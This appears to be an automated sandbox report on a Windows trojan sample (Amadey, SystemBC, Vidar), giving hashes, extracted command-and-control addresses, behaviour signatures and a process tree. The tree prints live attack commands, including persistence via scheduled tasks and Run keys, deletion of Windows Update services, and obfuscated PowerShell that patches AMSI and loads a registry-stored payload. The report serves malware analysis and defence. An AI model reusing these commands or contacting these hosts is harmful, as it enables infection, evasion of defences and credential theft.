Analysis
-
max time kernel
119s -
max time network
156s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
-
submitted
09-12-2022 20:32
General
-
Target
350a16fbb1c4aa34cb16cbad6967c0486a8a9f4f25dc54419169f074416ed9e4.exe
-
Size
410KB
-
MD5
473d2c529d33a0d17a9c088ad022b625
-
SHA1
7bcbdb11866032d9acd03e0ec78939ffeb5c3283
-
SHA256
350a16fbb1c4aa34cb16cbad6967c0486a8a9f4f25dc54419169f074416ed9e4
-
SHA512
c2ac3c4822879cccd8dc13d26c013a819ddfdb6e57878ebed5ba58a0033225084d07a2e0ecaadea88d7cd2021b0506a7615e8cbb21620c7f0b4a746cbd8701b6
-
SSDEEP
6144:ABUrf+1GE30SOTusD8xW1wQx2fCbo1u1MSRSB884oCP4y0Hc9PnRIg:sUW0fTusgx6mR1u1RkB8ToTHc9Cg
Malware Config
Extracted
amadey
3.50
85.209.135.109/jg94cVd30f/index.php
Extracted
systembc
89.22.236.225:4193
176.124.205.5:4193
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 6 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 57 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\350a16fbb1c4aa34cb16cbad6967c0486a8a9f4f25dc54419169f074416ed9e4.exe"C:\Users\Admin\AppData\Local\Temp\350a16fbb1c4aa34cb16cbad6967c0486a8a9f4f25dc54419169f074416ed9e4.exe"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\66916413880637337857.exe"C:\ProgramData\66916413880637337857.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\03bd543fce" /P "Admin:N"&&CACLS "..\03bd543fce" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:R" /E5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\1000018002\avicapn32.exe"C:\Users\Admin\1000018002\avicapn32.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000019012\syncfiles.dll, rundll4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exe"C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\350a16fbb1c4aa34cb16cbad6967c0486a8a9f4f25dc54419169f074416ed9e4.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f2⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f2⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f2⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f2⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\Admin\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\Admin\Locktime\RtkAudUService64.exe' }1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe1⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"1⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 32⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#baequo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "RtkAudUService64.exe" } Else { "C:\Users\Admin\Locktime\RtkAudUService64.exe" }1⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn RtkAudUService64.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:zevvIDtfOHAj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lnTDPZVdESyBrD,[Parameter(Position=1)][Type]$MuflnlSjLC)$jlCJwLoVhHF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+''+[Char](109)+'o'+'r'+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'gate'+'T'+''+[Char](121)+''+'p'+'e','Cl'+'a'+''+[Char](115)+'s'+','+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+'s,'+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$jlCJwLoVhHF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+'i'+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+','+'Hi'+[Char](100)+'e'+'B'+''+[Char](121)+'Si'+'g'+''+','+'Pu'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lnTDPZVdESyBrD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$jlCJwLoVhHF.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$MuflnlSjLC,$lnTDPZVdESyBrD).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'me'+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $jlCJwLoVhHF.CreateType();}$ZHamFOttSbXSX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+'cr'+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+'U'+''+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+'Z'+''+[Char](72)+'a'+[Char](109)+''+'F'+''+[Char](79)+''+'t'+''+'t'+''+[Char](83)+''+[Char](98)+'X'+[Char](83)+''+[Char](88)+'');$uAoOuJiEXTdOUI=$ZHamFOttSbXSX.GetMethod(''+[Char](117)+''+[Char](65)+''+[Char](111)+'O'+[Char](117)+''+'J'+''+[Char](105)+''+[Char](69)+''+[Char](88)+''+'T'+''+'d'+''+[Char](79)+''+[Char](85)+''+[Char](73)+'',[Reflection.BindingFlags]'Pu'+[Char](98)+'li'+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sPuhAbjOWOXzHHKjmQQ=zevvIDtfOHAj @([String])([IntPtr]);$CFlvBcjeKvnUjgyqhdztHr=zevvIDtfOHAj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rNhjtRcRkhl=$ZHamFOttSbXSX.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object]('ke'+[Char](114)+''+'n'+'e'+'l'+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$gqVyVttAizkBEA=$uAoOuJiEXTdOUI.Invoke($Null,@([Object]$rNhjtRcRkhl,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$MrlyxAJUKlLTuVFrR=$uAoOuJiEXTdOUI.Invoke($Null,@([Object]$rNhjtRcRkhl,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$SoksdRS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gqVyVttAizkBEA,$sPuhAbjOWOXzHHKjmQQ).Invoke('a'+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$gcJKNxIlCDYLHxAxX=$uAoOuJiEXTdOUI.Invoke($Null,@([Object]$SoksdRS,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+'c'+'a'+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$ipFCiBRhZA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MrlyxAJUKlLTuVFrR,$CFlvBcjeKvnUjgyqhdztHr).Invoke($gcJKNxIlCDYLHxAxX,[uint32]8,4,[ref]$ipFCiBRhZA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$gcJKNxIlCDYLHxAxX,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MrlyxAJUKlLTuVFrR,$CFlvBcjeKvnUjgyqhdztHr).Invoke($gcJKNxIlCDYLHxAxX,[uint32]8,0x20,[ref]$ipFCiBRhZA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+'T'+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+'d'+''+'i'+'al'+[Char](101)+''+[Char](114)+'s'+'t'+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vjzKGcmElnzW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HezLNaFocueQGU,[Parameter(Position=1)][Type]$BdPvLyafCz)$KMHgrJCGTby=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+''+[Char](114)+''+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('My'+[Char](68)+''+'e'+''+'l'+''+'e'+'gat'+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e',''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+''+','+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'e'+''+'a'+'led'+','+''+[Char](65)+''+'n'+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$KMHgrJCGTby.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+'l'+''+'N'+''+'a'+''+'m'+'e'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$HezLNaFocueQGU).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+''+[Char](103)+'ed');$KMHgrJCGTby.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'ic'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$BdPvLyafCz,$HezLNaFocueQGU).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+',M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');Write-Output $KMHgrJCGTby.CreateType();}$kGYCVPXGqIBWH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'f'+[Char](101)+''+'k'+''+[Char](71)+''+[Char](89)+''+[Char](67)+''+[Char](86)+''+[Char](80)+''+[Char](88)+''+[Char](71)+''+'q'+'I'+'B'+'WH');$sJHuJAGuEfycKd=$kGYCVPXGqIBWH.GetMethod(''+[Char](115)+''+[Char](74)+''+'H'+''+[Char](117)+''+[Char](74)+''+[Char](65)+'G'+'u'+''+[Char](69)+''+[Char](102)+''+[Char](121)+'c'+[Char](75)+'d',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ta'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IwtofzxhPpLwCDAabDS=vjzKGcmElnzW @([String])([IntPtr]);$DPlLhXmEYrRrgbAmUWgmqC=vjzKGcmElnzW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pIrCRlQJZVM=$kGYCVPXGqIBWH.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'a'+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rne'+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$bbuXEuQNuvIDCt=$sJHuJAGuEfycKd.Invoke($Null,@([Object]$pIrCRlQJZVM,[Object]('L'+[Char](111)+'a'+[Char](100)+'Li'+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'yA')));$ikokuiBFmEiPUoTfY=$sJHuJAGuEfycKd.Invoke($Null,@([Object]$pIrCRlQJZVM,[Object]('V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+'c'+[Char](116)+'')));$BNMOwIZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bbuXEuQNuvIDCt,$IwtofzxhPpLwCDAabDS).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$qTxhFvEUZQurjzOMe=$sJHuJAGuEfycKd.Invoke($Null,@([Object]$BNMOwIZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+'e'+''+'r'+'')));$GczvybuZAQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ikokuiBFmEiPUoTfY,$DPlLhXmEYrRrgbAmUWgmqC).Invoke($qTxhFvEUZQurjzOMe,[uint32]8,4,[ref]$GczvybuZAQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qTxhFvEUZQurjzOMe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ikokuiBFmEiPUoTfY,$DPlLhXmEYrRrgbAmUWgmqC).Invoke($qTxhFvEUZQurjzOMe,[uint32]8,0x20,[ref]$GczvybuZAQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+'AR'+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
-
C:\Users\Admin\Locktime\RtkAudUService64.exeC:\Users\Admin\Locktime\RtkAudUService64.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a732695a-2908-48cc-bdf1-837105aa5180}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3812 -s 9161⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3804 -s 7841⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\66916413880637337857.exeFilesize
288KB
MD517c628102c815a88e8d6cb429da24120
SHA100173cccaf107896f1bd13a1c71a696326b06145
SHA256ec080f4f8299ba8f18b18f38d1acba380f87b95daf451f90d73d5fdec441fcd3
SHA51274a360064b26ec24fa687f3c82670eb81a02584d1be1b45eb05cb183716abc5c1e3d34cf4a854b42e4d64f9802bf2f8deba49c509c6026bba4ee942cbd3b4e57
-
C:\ProgramData\66916413880637337857.exeFilesize
288KB
MD517c628102c815a88e8d6cb429da24120
SHA100173cccaf107896f1bd13a1c71a696326b06145
SHA256ec080f4f8299ba8f18b18f38d1acba380f87b95daf451f90d73d5fdec441fcd3
SHA51274a360064b26ec24fa687f3c82670eb81a02584d1be1b45eb05cb183716abc5c1e3d34cf4a854b42e4d64f9802bf2f8deba49c509c6026bba4ee942cbd3b4e57
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAA9.tmp.csvFilesize
33KB
MD5d474f8710d7412e124995ea189e247c5
SHA1fa0c2144b5285759de68e266ad4150389ac2329c
SHA2568488df02e6a0b48a0ca43a0392903c43d55e48e4014712ad8bec0430a72296db
SHA5123d9df24f5b5b2cd389fc118009f5c8c8988819bc1752dfecc463fdffb0835fba483f4210b366011a08fd472127d3103074d7b577dd4164eca28853c732d061e7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAE9.tmp.csvFilesize
33KB
MD5bc01daf3489ce15d9e56eece953a302a
SHA113559070c27bf9670e6d93993f41e02b32030f87
SHA256471262ceb55462009db8a25b391334c8ba777aeaf5746f4b9772cdd5bd0c3a1c
SHA5125fd4bc927e8741cefefba722bde1867f538c025a38c595ebcbb0bc7438008fcae2697916aaa56d77db4b13a2f4325fdfca7d146a27e7a4318221f2146610df2f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB76.tmp.txtFilesize
12KB
MD54e87616b5f50698cd94b9723001b385a
SHA117c65d8435f470e8de60e6828fc60ae7b51bebcf
SHA256ba24f95e8e9f300ee848f18cd81ef0a23fcaf72d2bf8ff71f7c8db7a7ca41029
SHA5129d49415ad74fe167003a59b89c96e64df455917db1ca7ddb2ab38e4b9648defdb1280b5674cc99ee6f003c74cf67697eb7cd468490b2938f1141b36b4c329830
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB77.tmp.txtFilesize
12KB
MD5666562805888817cbe8facfb149d6b64
SHA17195551b65804290ecb6b14d8f847d1a00b39f80
SHA256fa076c021415bfde7bbae1f40cca2ac7b56cf7afb88f58466f774e21e3a97ac4
SHA5126769cb69781fb6607ac262910955219856d2d122ba4fc65183b2af4dd9359e8dc3fe55dc67f3c068000b469001c8af1375158f3d25419fc9e7d5f8716d8be3ee
-
C:\ProgramData\VCRUNTIME140.dllFilesize
81KB
MD57587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
